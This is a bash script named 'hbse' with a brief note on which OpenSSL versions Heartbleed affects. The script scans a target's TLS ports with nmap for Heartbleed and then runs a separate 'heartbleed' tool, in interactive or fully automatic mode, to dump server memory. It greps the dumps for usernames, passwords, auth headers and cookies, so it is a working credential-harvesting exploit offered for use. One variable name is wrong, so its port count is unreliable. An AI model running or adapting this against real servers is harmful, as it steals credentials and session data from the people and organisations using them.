# Heartbleed #Affected OpenSSL versions #The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive). #Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable. #Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS. # Scan and exploit # ./hbse 127.0.0.1 # Interactive mode. # ./hbse --scan 127.0.0.1 # No interactive mode. Scan only. # ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit. # cat hbse #!/bin/bash ### TCP #### # 443 (HTTPS - HTTP over SSL) # 465 (SMTPS - SMTP over SSL) # 563 (NNTPS - NNTP over TLS/SSL) # 636 (LDAPS - LDAP over TLS/SSL) # 989 (FTPS Data - FTP Data over TLS/SSL) # 990 (FTPS Control - FTP Control over TLS/SSL) # 992 (Telnet over TLS/SSL) # 993 (IMAPS - IMAP over SSL) # 995 (POP3S - POP3 over SSL) # 1194 (OpenVPN) # 2484 (Oracle Database listening for SSL client) # 5061 (SIP over TLS) # 8443 (Apache Tomcat SSL) ### UDP ### # 563 (NNTPS - NNTP over TLS/SSL) # 636 (LDAPS - LDAP over TLS/SSL) # 4433 (OpenSSL) if [ $# -eq 1 ]; then ip="$1" elif [ $# -eq 2 ]; then se="$1" ip="$2" else exit fi nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433" function print() { text="$1" color="$2" if [ "$color" == "gray" ]; then header="\e[38;5;250m" elif [ "$color" == "red" ]; then header="\e[91m" elif [ "$color" == "green" ]; then header="\e[92m" elif [ "$color" == "yellow" ]; then header="\e[93m" fi tail="\e[0m" echo -en $header$text$tail } print "Checking if $ip is vulnerable on port 443... " "gray" vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`" if [ "$vulnerable" != "" ]; then print "Yes\n" "green" print "Checking if it is vulnerable on other ports... " "gray" vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`" n="`echo "$ports" | wc -l`" if [ "$n" == 1 ]; then print "No\n" "red" w1="port" w2="it" w3="file" else print "Yes\n" "green" w1="ports" w2="them" w3="files" fi print "Vulnerable $w1:\n" "gray" print "$vports\n" "green" if [ "$se" == "--scan" ]; then exit elif [ "$se" == "--exploit" ]; then answer="Y" else print "Do you want to exploit $w2? [Yn] " "gray" read answer fi if [ "$answer" = "Y" ]; then print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray" exec 3<<< "$vports" while read port <&3; do print "+ Port [$port]\n" "gray" ofile="$ip.$port" if [ -f $ofile ]; then rm -f $ofile; fi if [ "$port" == "465" ]; then precmd='-c 0' elif [ "$port" == "993" ]; then precmd='-c 2' elif [ "$port" == "995" ]; then precmd='-c 1' else precmd='' fi ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1 if [ -f $ofile ]; then r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`" print "$r\n" "green" if [ "$se" != "--exploit" ]; then print "Do you want to less the hexdump file? [Yn] " "gray" read answer if [ "$answer" = "Y" ]; then hexdump -C $ofile | less fi fi else print "Error: heartbleed did not work on port $port...\n" "yellow" fi done if [ "$se" != "--exploit" ]; then print "Do you want to delete the hexdump $w3? [Yn] " "gray" read answer if [ "$answer" = "Y" ]; then rm -f $ip.* fi fi fi else print "No\n" "red" fi